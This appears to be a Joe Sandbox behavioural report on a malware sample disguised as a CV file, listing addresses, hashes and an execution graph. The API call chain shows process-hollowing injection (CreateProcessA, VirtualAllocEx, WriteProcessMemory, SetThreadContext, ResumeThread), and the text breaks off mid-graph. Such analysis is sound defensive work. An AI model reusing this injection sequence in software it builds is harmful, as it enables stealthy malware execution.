                                    execution_graph 50876 5f87608 50877 5f87656 DrawTextExW 50876->50877 50879 5f876ae 50877->50879 50551 2b5d1b4 50552 2b5d1cc 50551->50552 50554 2b5d226 50552->50554 50558 5e41e54 50552->50558 50566 5e44579 50552->50566 50571 5e452d9 50552->50571 50579 5e44588 50552->50579 50559 5e41e5f 50558->50559 50560 5e45349 50559->50560 50562 5e45339 50559->50562 50563 5e45347 50560->50563 50591 5e41f7c 50560->50591 50583 5e45460 50562->50583 50587 5e45470 50562->50587 50567 5e44586 50566->50567 50568 5e44604 50566->50568 50569 5e41e54 CallWindowProcW 50567->50569 50568->50554 50570 5e445cf 50569->50570 50570->50554 50572 5e452e8 50571->50572 50573 5e45349 50572->50573 50575 5e45339 50572->50575 50574 5e41f7c CallWindowProcW 50573->50574 50576 5e45347 50573->50576 50574->50576 50577 5e45460 CallWindowProcW 50575->50577 50578 5e45470 CallWindowProcW 50575->50578 50577->50576 50578->50576 50580 5e445ae 50579->50580 50581 5e41e54 CallWindowProcW 50580->50581 50582 5e445cf 50581->50582 50582->50554 50584 5e45470 50583->50584 50595 5e45528 50584->50595 50585 5e45510 50585->50563 50588 5e45484 50587->50588 50590 5e45528 CallWindowProcW 50588->50590 50589 5e45510 50589->50563 50590->50589 50592 5e41f87 50591->50592 50593 5e46baa CallWindowProcW 50592->50593 50594 5e46b59 50592->50594 50593->50594 50594->50563 50596 5e45539 50595->50596 50598 5e46aeb 50595->50598 50596->50585 50599 5e41f7c CallWindowProcW 50598->50599 50600 5e46afa 50599->50600 50600->50596 50880 7892078 50882 7892203 50880->50882 50883 789209e 50880->50883 50881 789223e 50882->50881 50887 7892388 PostMessageW 50882->50887 50883->50882 50884 7892388 PostMessageW 50883->50884 50888 78922f8 50883->50888 50891 78922f0 50883->50891 50884->50883 50887->50881 50889 789231c PostMessageW 50888->50889 50890 7892364 50889->50890 50890->50883 50892 78922f8 PostMessageW 50891->50892 50894 7892364 50892->50894 50894->50883 50790 5e40830 50792 5e40858 50790->50792 50791 5e40880 50792->50791 50795 5e408e0 50792->50795 50800 5e408c8 50792->50800 50796 5e408ef 50795->50796 50805 5e42640 50796->50805 50811 5e42648 50796->50811 50797 5e40929 50797->50791 50801 5e408ef 50800->50801 50803 5e42640 CreateWindowExW 50801->50803 50804 5e42648 CreateWindowExW 50801->50804 50802 5e40929 50802->50791 50803->50802 50804->50802 50807 5e42779 50805->50807 50808 5e42679 50805->50808 50806 5e42685 50806->50797 50808->50806 50817 5e434a0 50808->50817 50822 5e43491 50808->50822 50813 5e42679 50811->50813 50814 5e42779 50811->50814 50812 5e42685 50812->50797 50813->50812 50815 5e434a0 CreateWindowExW 50813->50815 50816 5e43491 CreateWindowExW 50813->50816 50815->50814 50816->50814 50818 5e434cb 50817->50818 50819 5e4357a 50818->50819 50827 5e44380 50818->50827 50830 5e44371 50818->50830 50824 5e434cb 50822->50824 50823 5e4357a 50823->50823 50824->50823 50825 5e44380 CreateWindowExW 50824->50825 50826 5e44371 CreateWindowExW 50824->50826 50825->50823 50826->50823 50834 5e41e28 50827->50834 50831 5e44380 50830->50831 50832 5e41e28 CreateWindowExW 50831->50832 50833 5e443b5 50832->50833 50833->50819 50835 5e443d0 CreateWindowExW 50834->50835 50837 5e444f4 50835->50837 50837->50837 50838 5e40040 50839 5e40086 50838->50839 50843 5e40220 50839->50843 50847 5e40210 50839->50847 50840 5e40173 50852 5e40280 DuplicateHandle 50843->50852 50854 5e40288 DuplicateHandle 50843->50854 50844 5e4024e 50844->50840 50848 5e40220 50847->50848 50850 5e40280 DuplicateHandle 50848->50850 50851 5e40288 DuplicateHandle 50848->50851 50849 5e4024e 50849->50840 50850->50849 50851->50849 50853 5e4031e 50852->50853 50853->50844 50855 5e4031e 50854->50855 50855->50844 50856 2cd4668 50857 2cd4672 50856->50857 50859 2cd4761 50856->50859 50860 2cd4785 50859->50860 50864 2cd4860 50860->50864 50868 2cd4870 50860->50868 50866 2cd4870 50864->50866 50865 2cd4974 50866->50865 50872 2cd4538 50866->50872 50870 2cd4897 50868->50870 50869 2cd4974 50869->50869 50870->50869 50871 2cd4538 CreateActCtxA 50870->50871 50871->50869 50873 2cd5d00 CreateActCtxA 50872->50873 50875 2cd5dc3 50873->50875 50875->50875 50601 7890485 50602 78906e3 50601->50602 50606 7890e41 50602->50606 50624 7890e50 50602->50624 50603 78906b5 50608 7890e6a 50606->50608 50607 7890e8e 50607->50603 50642 789166a 50608->50642 50647 7891631 50608->50647 50652 789155e 50608->50652 50661 789143c 50608->50661 50666 78913db 50608->50666 50671 78917fb 50608->50671 50678 78912f8 50608->50678 50683 7891905 50608->50683 50688 7891303 50608->50688 50693 7891a63 50608->50693 50698 78918e0 50608->50698 50703 7891360 50608->50703 50712 7891741 50608->50712 50721 789128f 50608->50721 50725 78917cf 50608->50725 50625 7890e6a 50624->50625 50627 789166a 2 API calls 50625->50627 50628 78917cf 4 API calls 50625->50628 50629 789128f 2 API calls 50625->50629 50630 7891741 4 API calls 50625->50630 50631 7891360 4 API calls 50625->50631 50632 78918e0 2 API calls 50625->50632 50633 7891a63 2 API calls 50625->50633 50634 7891303 2 API calls 50625->50634 50635 7891905 2 API calls 50625->50635 50636 78912f8 2 API calls 50625->50636 50637 78917fb 4 API calls 50625->50637 50638 78913db 2 API calls 50625->50638 50639 789143c 2 API calls 50625->50639 50640 789155e 4 API calls 50625->50640 50641 7891631 2 API calls 50625->50641 50626 7890e8e 50626->50603 50627->50626 50628->50626 50629->50626 50630->50626 50631->50626 50632->50626 50633->50626 50634->50626 50635->50626 50636->50626 50637->50626 50638->50626 50639->50626 50640->50626 50641->50626 50643 7891673 50642->50643 50734 751f890 50643->50734 50738 751f898 50643->50738 50644 78914e6 50644->50607 50648 7891655 50647->50648 50742 751f7d0 50648->50742 50746 751f7d8 50648->50746 50649 7891c02 50653 7891567 50652->50653 50654 78917e9 50653->50654 50656 7891b51 50653->50656 50750 751f650 50653->50750 50754 751f649 50653->50754 50758 751f700 50654->50758 50762 751f6f8 50654->50762 50655 789195c 50662 78913f3 50661->50662 50766 751f981 50662->50766 50770 751f988 50662->50770 50663 7891a8c 50667 78913e1 50666->50667 50669 751f981 ReadProcessMemory 50667->50669 50670 751f988 ReadProcessMemory 50667->50670 50668 7891a8c 50669->50668 50670->50668 50674 751f700 Wow64SetThreadContext 50671->50674 50675 751f6f8 Wow64SetThreadContext 50671->50675 50672 78913f3 50676 751f981 ReadProcessMemory 50672->50676 50677 751f988 ReadProcessMemory 50672->50677 50673 7891a8c 50674->50672 50675->50672 50676->50673 50677->50673 50679 78912ee 50678->50679 50680 7891bcb 50679->50680 50681 751f890 WriteProcessMemory 50679->50681 50682 751f898 WriteProcessMemory 50679->50682 50681->50679 50682->50679 50685 78912ee 50683->50685 50684 7891bcb 50685->50683 50685->50684 50686 751f890 WriteProcessMemory 50685->50686 50687 751f898 WriteProcessMemory 50685->50687 50686->50685 50687->50685 50689 7891313 50688->50689 50691 751f890 WriteProcessMemory 50689->50691 50692 751f898 WriteProcessMemory 50689->50692 50690 78913bc 50690->50607 50691->50690 50692->50690 50694 7891a69 50693->50694 50695 7891a8c 50694->50695 50696 751f981 ReadProcessMemory 50694->50696 50697 751f988 ReadProcessMemory 50694->50697 50696->50695 50697->50695 50700 78913db 50698->50700 50699 7891a8c 50701 751f981 ReadProcessMemory 50700->50701 50702 751f988 ReadProcessMemory 50700->50702 50701->50699 50702->50699 50705 7891365 50703->50705 50704 78917e9 50710 751f700 Wow64SetThreadContext 50704->50710 50711 751f6f8 Wow64SetThreadContext 50704->50711 50705->50704 50707 7891b51 50705->50707 50708 751f650 ResumeThread 50705->50708 50709 751f649 ResumeThread 50705->50709 50706 789195c 50708->50705 50709->50705 50710->50706 50711->50706 50713 789168b 50712->50713 50714 78917e9 50713->50714 50716 7891b51 50713->50716 50717 751f650 ResumeThread 50713->50717 50718 751f649 ResumeThread 50713->50718 50719 751f700 Wow64SetThreadContext 50714->50719 50720 751f6f8 Wow64SetThreadContext 50714->50720 50715 789195c 50717->50713 50718->50713 50719->50715 50720->50715 50774 7890040 50721->50774 50778 7890007 50721->50778 50729 789168b 50725->50729 50726 78917e9 50730 751f700 Wow64SetThreadContext 50726->50730 50731 751f6f8 Wow64SetThreadContext 50726->50731 50727 789195c 50728 7891b51 50729->50726 50729->50728 50732 751f650 ResumeThread 50729->50732 50733 751f649 ResumeThread 50729->50733 50730->50727 50731->50727 50732->50729 50733->50729 50735 751f898 WriteProcessMemory 50734->50735 50737 751f937 50735->50737 50737->50644 50739 751f8e0 WriteProcessMemory 50738->50739 50741 751f937 50739->50741 50741->50644 50743 751f7d8 VirtualAllocEx 50742->50743 50745 751f855 50743->50745 50745->50649 50747 751f818 VirtualAllocEx 50746->50747 50749 751f855 50747->50749 50749->50649 50751 751f690 ResumeThread 50750->50751 50753 751f6c1 50751->50753 50753->50653 50755 751f650 ResumeThread 50754->50755 50757 751f6c1 50755->50757 50757->50653 50759 751f745 Wow64SetThreadContext 50758->50759 50761 751f78d 50759->50761 50761->50655 50763 751f6fe Wow64SetThreadContext 50762->50763 50765 751f78d 50763->50765 50765->50655 50767 751f9d3 ReadProcessMemory 50766->50767 50769 751fa17 50767->50769 50769->50663 50771 751f9d3 ReadProcessMemory 50770->50771 50773 751fa17 50771->50773 50773->50663 50775 78900c9 CreateProcessA 50774->50775 50777 789028b 50775->50777 50777->50777 50779 7890040 CreateProcessA 50778->50779 50781 789028b 50779->50781 50781->50781 50895 2cdd730 50896 2cdd73f 50895->50896 50898 2cdd81a 50895->50898 50899 2cdd839 50898->50899 50900 2cdd85c 50898->50900 50899->50900 50906 2cddac0 50899->50906 50910 2cddab2 50899->50910 50900->50896 50901 2cdd854 50901->50900 50902 2cdda60 GetModuleHandleW 50901->50902 50903 2cdda8d 50902->50903 50903->50896 50907 2cddad4 50906->50907 50908 2cddaf9 50907->50908 50914 2cdcbe0 50907->50914 50908->50901 50911 2cddad4 50910->50911 50912 2cdcbe0 LoadLibraryExW 50911->50912 50913 2cddaf9 50911->50913 50912->50913 50913->50901 50915 2cddc80 LoadLibraryExW 50914->50915 50917 2cddcf9 50915->50917 50917->50908 50782 7892246 50783 7892238 50782->50783 50784 789223e 50783->50784 50786 7892388 50783->50786 50787 789231c PostMessageW 50786->50787 50789 7892397 50786->50789 50788 7892364 50787->50788 50788->50784

                                    Executed Functions

                                    Function 05E4A168 Relevance: 28.5, Strings: 21, Instructions: 2290COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 294 5e4a168-5e4a19c 297 5e4a1be-5e4a47c call 5e49eb4 * 5 call 5e49ec4 * 2 call 5e49ed4 call 5e49ee4 call 5e49ef4 * 2 call 5e49f04 * 2 call 5e49ef4 * 3 call 5e49eb4 call 5e49f14 294->297 298 5e4a19e-5e4a1bd 294->298 908 5e4a47f call 5f8afa0 297->908 909 5e4a47f call 5f8af91 297->909 378 5e4a482-5e4ac61 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f64 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f64 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f64 call 5e49f14 call 5e49f24 910 5e4ac66 call 2cd7788 378->910 911 5e4ac66 call 2cd7798 378->911 480 5e4ac6b-5e4ad39 493 5e4c687-5e4c6a9 480->493 494 5e4ad3f-5e4ad5f 480->494 498 5e4c6b3-5e4c773 call 5e4a054 call 5e4a064 493->498 912 5e4c6ae call 2cd9d4c 493->912 913 5e4c6ae call 2cdb188 493->913 494->493 497 5e4ad65-5e4ad7a 494->497 497->493 502 5e4ad80-5e4adac 497->502 510 5e4adb3-5e4c686 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f14 call 5e49f74 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f14 call 5e49f84 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f94 call 5e49fa4 call 5e49fb4 * 3 call 5e49fc4 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49fd4 call 5e49fe4 call 5e49fb4 * 3 call 5e49fc4 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49fd4 call 5e49fe4 call 5e49f14 call 5e49f74 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f14 call 5e49f74 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49fb4 * 3 call 5e49fc4 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49fd4 call 5e49fe4 call 5e49fb4 * 3 call 5e49fc4 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49fd4 call 5e49fe4 call 5e49fb4 * 3 call 5e49fc4 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49fd4 call 5e49fe4 call 5e49f14 call 5e49f24 call 5e49f34 call 5e49f44 call 5e49f54 call 5e49f64 call 5e49ff4 call 5e4a004 call 5e4a014 call 5e4a024 * 17 call 5e49f14 call 5e4a034 call 5e49f34 call 5e47f88 call 5e4a044 502->510 908->378 909->378 910->480 911->480 912->498 913->498
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1207544579.0000000005E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_5e40000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $!$)$6$:$>$>$>$S$S$T$T$X$Z$Z$]$o${${$|$|
                                    • API String ID: 0-439525591
                                    • Opcode ID: e5a2cc2edf8e9e43f34ce9942e641383890ddda79c1bedc9b5a3dba8eb34e748
                                    • Instruction ID: 334a4dcf1963e8dac9ec7f512d7f82aeab8bc54d38489b8351472bcaa88641b3
                                    • Opcode Fuzzy Hash: e5a2cc2edf8e9e43f34ce9942e641383890ddda79c1bedc9b5a3dba8eb34e748
                                    • Instruction Fuzzy Hash: 2333F934A00614CFCB65DF34C894B9AB7F2BF89304F5185A9E54AAB361DB35AE85CF40
                                    Function 07510448 Relevance: 5.4, Strings: 4, Instructions: 437COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 976 7510448-7510473 977 7510475 976->977 978 751047a-75104c2 976->978 977->978 979 75104c3 978->979 980 75104ca-75104e6 979->980 981 75104e8 980->981 982 75104ef-75104f0 980->982 981->979 983 75104f2-7510510 call 7510c58 981->983 984 751053b-7510583 981->984 985 7510651-7510663 981->985 986 7510811-7510824 981->986 987 7510512 call 7510ca3 981->987 988 751089b-75108ae 981->988 989 751071a-7510740 981->989 990 751075d-751076f 981->990 991 75105df-75105f7 981->991 992 75107c2 981->992 993 7510745-7510758 981->993 994 7510586 981->994 995 75106cb-75106de 981->995 996 75105ca-75105dd 981->996 997 751068f-75106a2 981->997 998 751084f 981->998 999 75107f1-751080f 981->999 1000 75108b0 981->1000 1001 75105b5-75105c8 981->1001 1002 75105f8 981->1002 1003 751087e-7510899 981->1003 1004 75106e3-75106e7 981->1004 1005 75106a7-75106c6 981->1005 1006 7510826 981->1006 1007 751062a-7510638 call 7511158 981->1007 982->983 982->984 983->980 984->994 1012 7510665-7510674 985->1012 1013 7510676-751067d 985->1013 1008 75107c9-75107e5 986->1008 1032 7510518-7510539 987->1032 1009 7510856-7510872 988->1009 1011 75105ff-751061b 989->1011 1081 7510775 call 751130b 990->1081 1082 7510775 call 751124b 990->1082 991->1002 992->1008 993->1011 1010 751058d-75105a9 994->1010 995->1011 996->1010 997->1011 998->1009 999->1008 1031 7510966 1000->1031 1001->1010 1002->1011 1003->1009 1014 75106e9-75106f8 1004->1014 1015 75106fa-7510701 1004->1015 1005->1011 1006->998 1025 751063e-751064f 1007->1025 1018 75107e7 1008->1018 1019 75107ee-75107ef 1008->1019 1026 7510874 1009->1026 1027 751087b-751087c 1009->1027 1016 75105b2-75105b3 1010->1016 1017 75105ab 1010->1017 1023 7510624-7510625 1011->1023 1024 751061d 1011->1024 1022 7510684-751068a 1012->1022 1013->1022 1028 7510708-7510715 1014->1028 1015->1028 1016->991 1016->1001 1017->985 1017->986 1017->988 1017->989 1017->990 1017->991 1017->992 1017->993 1017->994 1017->995 1017->996 1017->997 1017->998 1017->999 1017->1000 1017->1001 1017->1002 1017->1003 1017->1004 1017->1005 1017->1006 1017->1007 1018->986 1018->988 1018->992 1018->998 1018->999 1018->1000 1018->1003 1018->1006 1018->1031 1036 7510bb3-7510bba 1018->1036 1037 7510a76-7510ab0 call 7514fab call 7515b00 1018->1037 1038 7510a56-7510a57 1018->1038 1039 7510b9b-7510bae 1018->1039 1040 7510adc-7510b63 call 7512f08 1018->1040 1041 75109a4-7510a0c 1018->1041 1019->999 1019->1006 1022->1011 1023->990 1023->1007 1024->985 1024->986 1024->988 1024->989 1024->990 1024->992 1024->993 1024->995 1024->997 1024->998 1024->999 1024->1000 1024->1002 1024->1003 1024->1004 1024->1005 1024->1006 1024->1007 1025->1011 1026->988 1026->998 1026->1000 1026->1003 1026->1031 1026->1036 1026->1037 1026->1038 1026->1039 1026->1040 1026->1041 1027->1000 1027->1003 1028->1011 1042 751096d-7510989 1031->1042 1032->980 1058 7510ab6-7510ad7 1037->1058 1072 7510a59 call 7891fd8 1038->1072 1073 7510a59 call 7891fe8 1038->1073 1075 7510b66 call 751130b 1040->1075 1076 7510b66 call 751124b 1040->1076 1062 7510a36 1041->1062 1063 7510a0e-7510a1a 1041->1063 1044 751098b 1042->1044 1045 751099e-751099f 1042->1045 1043 751077b-75107c0 1043->992 1043->1006 1044->1031 1044->1036 1044->1037 1044->1038 1044->1039 1044->1040 1044->1041 1045->1036 1045->1041 1048 7510a5f-7510a71 1048->1042 1064 7510a3c-7510a51 1062->1064 1065 7510a24-7510a2a 1063->1065 1066 7510a1c-7510a22 1063->1066 1064->1042 1068 7510a34 1065->1068 1066->1068 1068->1064 1070 7510b6c-7510b7e call 75165d0 1071 7510b84-7510b96 1070->1071 1072->1048 1073->1048 1075->1070 1076->1070 1081->1043 1082->1043
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1208201736.0000000007510000.00000040.00000800.00020000.00000000.sdmp, Offset: 07510000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7510000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $q$$q$5$z-,
                                    • API String ID: 0-3437111781
                                    • Opcode ID: 296974b0b81dd0bdca11b593ae38a595e03f082f362581098aac66d7ad93b656
                                    • Instruction ID: 210e30d7e077bb362473ee0c1031c45246c1560851a502906edfbeb21addfcec
                                    • Opcode Fuzzy Hash: 296974b0b81dd0bdca11b593ae38a595e03f082f362581098aac66d7ad93b656
                                    • Instruction Fuzzy Hash: 841213B4E15218CFEB14CFA9D9947DDBBB2BF89301F10946AD40ABB294DB349981CF14
                                    Function 02CD7850 Relevance: 4.7, Strings: 3, Instructions: 922COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1085 2cd7850-2cd78b4 1087 2cd7dfc-2cd7e15 1085->1087 1088 2cd78ba-2cd7a25 1085->1088 1090 2cd7e8e-2cd7ed9 1087->1090 1091 2cd7e17-2cd7e3d 1087->1091 1218 2cd7a5f-2cd7a61 1088->1218 1219 2cd7a27-2cd7a5d 1088->1219 1101 2cd7edb-2cd7ee1 1090->1101 1102 2cd7ee6-2cd7eee 1090->1102 1096 2cd846a-2cd8497 1091->1096 1097 2cd7e43-2cd7e4e 1091->1097 1114 2cd8499-2cd84a1 1096->1114 1115 2cd84b1-2cd84d7 1096->1115 1097->1096 1100 2cd7e54-2cd7e6c 1097->1100 1100->1096 1104 2cd7e72-2cd7e8d call 2cd0210 1100->1104 1105 2cd7f79-2cd7fc2 1101->1105 1106 2cd7f11 1102->1106 1107 2cd7ef0-2cd7f0f 1102->1107 1120 2cd803f-2cd80a0 1105->1120 1121 2cd7fc4-2cd7ff0 1105->1121 1111 2cd7f18-2cd7f1a 1106->1111 1107->1111 1118 2cd7f1c-2cd7f1e 1111->1118 1119 2cd7f20-2cd7f26 1111->1119 1114->1115 1122 2cd84a3-2cd84b0 1114->1122 1127 2cd84d9-2cd84e9 1115->1127 1128 2cd8517-2cd852f 1115->1128 1118->1105 1125 2cd7f2e-2cd7f36 1119->1125 1272 2cd80a2 call 2cd9760 1120->1272 1273 2cd80a2 call 2cd9730 1120->1273 1121->1096 1131 2cd7ff6-2cd7ffd 1121->1131 1125->1105 1130 2cd7f38-2cd7f3b 1125->1130 1144 2cd84eb-2cd84ff 1127->1144 1145 2cd8506-2cd850d 1127->1145 1142 2cd854c-2cd8550 1128->1142 1143 2cd8531-2cd8545 1128->1143 1129 2cd80a8-2cd80b9 1129->1096 1133 2cd80bf-2cd80e8 1129->1133 1134 2cd7f41-2cd7f49 1130->1134 1131->1096 1135 2cd8003-2cd800f 1131->1135 1133->1096 1138 2cd80ee-2cd80fb 1133->1138 1134->1096 1139 2cd7f4f-2cd7f77 1134->1139 1135->1096 1141 2cd8015-2cd8021 1135->1141 1138->1096 1140 2cd8101-2cd811d 1138->1140 1139->1105 1139->1134 1147 2cd819f-2cd81c9 1140->1147 1148 2cd8123-2cd8129 1140->1148 1141->1096 1151 2cd8027-2cd8037 1141->1151 1142->1128 1152 2cd8552-2cd8556 1142->1152 1143->1142 1144->1145 1149 2cd850f-2cd8516 1145->1149 1150 2cd8557-2cd85c2 1145->1150 1155 2cd81cb-2cd81cf 1147->1155 1156 2cd8221-2cd8233 1147->1156 1153 2cd8158-2cd816a 1148->1153 1154 2cd812b-2cd8152 1148->1154 1151->1120 1153->1096 1161 2cd8170-2cd8189 1153->1161 1154->1153 1155->1156 1162 2cd81d1 1155->1162 1163 2cd823c-2cd8240 1156->1163 1164 2cd8235-2cd823a 1156->1164 1161->1096 1169 2cd818f-2cd819d 1161->1169 1170 2cd81d6-2cd81e4 1162->1170 1163->1096 1165 2cd8246-2cd824e 1163->1165 1172 2cd82a2-2cd82a9 1164->1172 1165->1096 1173 2cd8254-2cd8261 1165->1173 1169->1147 1169->1148 1170->1096 1177 2cd81ea-2cd81ff 1170->1177 1174 2cd82ab-2cd82bd 1172->1174 1175 2cd8315-2cd8335 1172->1175 1173->1096 1178 2cd8267-2cd8274 1173->1178 1174->1175 1180 2cd82bf-2cd82d7 1174->1180 1193 2cd8338-2cd8363 1175->1193 1177->1096 1181 2cd8205-2cd8212 1177->1181 1178->1096 1182 2cd827a-2cd8297 1178->1182 1189 2cd82d9 1180->1189 1190 2cd8303-2cd8313 call 2cd0210 1180->1190 1181->1096 1184 2cd8218-2cd821f 1181->1184 1182->1172 1184->1156 1184->1170 1194 2cd82dc-2cd82de 1189->1194 1190->1193 1196 2cd83ed-2cd8400 1193->1196 1197 2cd8369-2cd83ea 1193->1197 1194->1096 1198 2cd82e4-2cd82f2 1194->1198 1199 2cd845f-2cd8469 1196->1199 1200 2cd8402-2cd843b 1196->1200 1197->1196 1198->1096 1202 2cd82f8-2cd8301 1198->1202 1200->1199 1213 2cd843d-2cd8459 1200->1213 1202->1190 1202->1194 1213->1199 1220 2cd7a67-2cd7a71 1218->1220 1221 2cd7a63-2cd7a65 1218->1221 1219->1218 1223 2cd7a73-2cd7a89 1220->1223 1221->1223 1225 2cd7a8f-2cd7a97 1223->1225 1226 2cd7a8b-2cd7a8d 1223->1226 1228 2cd7a99-2cd7a9e 1225->1228 1226->1228 1229 2cd7ab1-2cd7ad8 1228->1229 1230 2cd7aa0-2cd7aab 1228->1230 1234 2cd7b0c-2cd7b16 1229->1234 1235 2cd7ada-2cd7ae6 1229->1235 1230->1229 1237 2cd7b1f-2cd7ba7 1234->1237 1238 2cd7b18 1234->1238 1235->1234 1236 2cd7ae8-2cd7af5 1235->1236 1241 2cd7afb-2cd7b06 1236->1241 1242 2cd7af7-2cd7af9 1236->1242 1248 2cd7ba9-2cd7be5 1237->1248 1249 2cd7be7-2cd7bf5 1237->1249 1238->1237 1241->1234 1242->1234 1252 2cd7c00-2cd7c37 1248->1252 1249->1252 1269 2cd7c3d call 2cd8961 1252->1269 1270 2cd7c3d call 2cd88c0 1252->1270 1271 2cd7c3d call 2cd88b2 1252->1271 1256 2cd7c43-2cd7cd0 1261 2cd7cfe-2cd7d1a 1256->1261 1262 2cd7cd2-2cd7cfc 1256->1262 1264 2cd7d1c 1261->1264 1265 2cd7d28-2cd7d29 1261->1265 1262->1261 1264->1265 1265->1087 1269->1256 1270->1256 1271->1256 1272->1129 1273->1129
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1203902701.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2cd0000_Curriculum Vitae Catalina Munoz.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: LRq$LRq$\sq
                                    • API String ID: 0-3677092283
                                    • Opcode ID: cf72d995a0a5067144987d725ead8f7def3761134e826f17f182365865f56659
                                    • Instruction ID: 6e6bb5acfad956bd1fa920d9cb08a5fe6f83c058c984a0022ed847e55403c33d
                                    • Opcode Fuzzy Hash: cf72d995a0a5067144987d725ead8f7def3761134e826f17f182365865f56659
                                    • Instruction Fuzzy Hash: 16828D75E006298FCB14CF69D885AADBBF2FF88300F15C669E419EB345D734A946CB90
                                    Function 07510443 Relevance: 4.2, Strings: 3, Instructions: 421COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1274 7510443-7510473 1276 7510475 1274->1276 1277 751047a-75104c2 1274->1277 1276->1277 1278 75104c3 1277->1278 1279 75104ca-75104e6 1278->1279 1280 75104e8 1279->1280 1281 75104ef-75104f0 1279->1281 1280->1278 1282 75104f2-7510510 call 7510c58 1280->1282 1283 751053b-7510583 1280->1283 1284 7510651-7510663 1280->1284 1285 7510811-7510824 1280->1285 1286 7510512 call 7510ca3 1280->1286 1287 751089b-75108ae 1280->1287 1288 751071a-7510740 1280->1288 1289 751075d-751076f 1280->1289 1290 75105df-75105f7 1280->1290 1291 75107c2 1280->1291 1292 7510745-7510758 1280->1292 1293 7510586 1280->1293 1294 75106cb-75106de 1280->1294 1295 75105ca-75105dd 1280->1295 1296 751068f-75106a2 1280->1296 1297 751084f 1280->1297 1298 75107f1-751080f 1280->1298 1299 75108b0 1280->1299 1300 75105b5-75105c8 1280->1300 1301 75105f8 1280->1301 1302 751087e-7510899 1280->1302 1303 75106e3-75106e7 1280->1303 1304 75106a7-75106c6 1280->1304 1305 7510826 1280->1305 1306 751062a-7510638 call 7511158 1280->1306 1281->1282 1281->1283 1282->1279 1283->1293 1311 7510665-7510674 1284->1311 1312 7510676-751067d 1284->1312 1307 75107c9-75107e5 1285->1307 1331 7510518-7510539 1286->1331 1308 7510856-7510872 1287->1308 1310 75105ff-751061b 1288->1310 1373 7510775 call 751130b 1289->1373 1374 7510775 call 751124b 1289->1374 1290->1301 1291->1307 1292->1310 1309 751058d-75105a9 1293->1309 1294->1310 1295->1309 1296->1310 1297->1308 1298->1307 1330 7510966 1299->1330 1300->1309 1301->1310 1302->1308 1313 75106e9-75106f8 1303->1313 1314 75106fa-7510701 1303->1314 1304->1310 1305->1297 1324 751063e-751064f 1306->1324 1317 75107e7 1307->1317 1318 75107ee-75107ef 1307->1318 1325 7510874 1308->1325 1326 751087b-751087c 1308->1326 1315 75105b2-75105b3 1309->1315 1316 75105ab 1309->1316 1322 7510624-7510625 1310->1322 1323 751061d 1310->1323 1321 7510684-751068a 1311->1321 1312->1321 1327 7510708-7510715 1313->1327 1314->1327 1315->1290 1315->1300 1316->1284 1316->1285 1316->1287 1316->1288 1316->1289 1316->1290 1316->1291 1316->1292 1316->1293 1316->1294 1316->1295 1316->1296 1316->1297 1316->1298 1316->1299 1316->1300 1316->1301 1316->1302 1316->1303 1316->1304 1316->1305 1316->1306 1317->1285 1317->1287 1317->1291 1317->1297 1317->1298 1317->1299 1317->1302 1317->1305 1317->1330 1335 7510bb3-7510bba 1317->1335 1336 7510a76-7510ab0 call 7514fab call 7515b00 1317->1336 1337 7510a56-7510a57 1317->1337 1338 7510b9b-7510bae 1317->1338 1339 7510adc-7510b63 call 7512f08 1317->1339 1340 75109a4-7510a0c 1317->1340 1318->1298 1318->1305 1321->1310 1322->1289 1322->1306 1323->1284 1323->1285 1323->1287 1323->1288 1323->1289 1323->1291 1323->1292 1323->1294 1323->1296 1323->1297 1323->1298 1323->1299 1323->1301 1323->1302 1323->1303 1323->1304 1323->1305 1323->1306 1324->1310 1325->1287 1325->1297 1325->1299 1325->1302 1325->1330 1325->1335 1325->1336 1325->1337 1325->1338 1325->1339 1325->1340 1326->1299 1326->1302 1327->1310 1341 751096d-7510989 1330->1341 1331->1279 1357 7510ab6-7510ad7 1336->1357 1377 7510a59 call 7891fd8 1337->1377 1378 7510a59 call 7891fe8 1337->1378 1380 7510b66 call 751130b 1339->1380 1381 7510b66 call 751124b 1339->1381 1361 7510a36 1340->1361 1362 7510a0e-7510a1a 1340->1362 1343 751098b 1341->1343 1344 751099e-751099f 1341->1344 